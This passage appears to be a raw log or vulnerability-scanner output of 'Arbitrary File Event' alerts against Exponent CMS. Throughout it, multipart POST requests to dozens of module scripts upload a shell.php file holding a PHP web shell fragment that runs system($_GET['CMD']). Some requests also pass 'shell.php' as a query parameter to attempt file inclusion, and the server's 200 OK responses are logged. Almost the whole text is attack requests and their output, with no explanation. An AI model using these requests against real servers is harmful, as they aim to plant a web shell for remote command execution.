en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:00 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/ad_save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:00 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/af_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:00 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/af_edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:00 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/af_save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:01 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:01 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:01 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/manifest.php?printerfriendly=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:01 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/delete_article.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:02 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/edit_article.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:02 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/rank_switch.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:02 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/save_article.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:02 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/save_submission.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:02 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/submit_article.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:03 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/view_article.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:03 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/articlemodule/actions/view_submissions.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:03 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:03 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/class.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:03 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/deps.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:04 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:04 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/tasks/coretasks.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:04 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/tasks/htmlarea_tasks.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:04 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/tasks/htmlarea_tasks.php?section=shell.php&action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:04 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/tasks/htmlarea_tasks.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:05 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/tasks/search_tasks.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:05 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/clear_smarty_cache.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:05 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/configuresite.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:05 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/configuresite.php?ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/configuresite.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_activate.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_configuresite.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:07 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_save.php?printerfriendly=shell.php&action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:07 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/config_save.php?section=shell.php&action=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:07 GMT Server: Apache/2.2.14 (Win32) 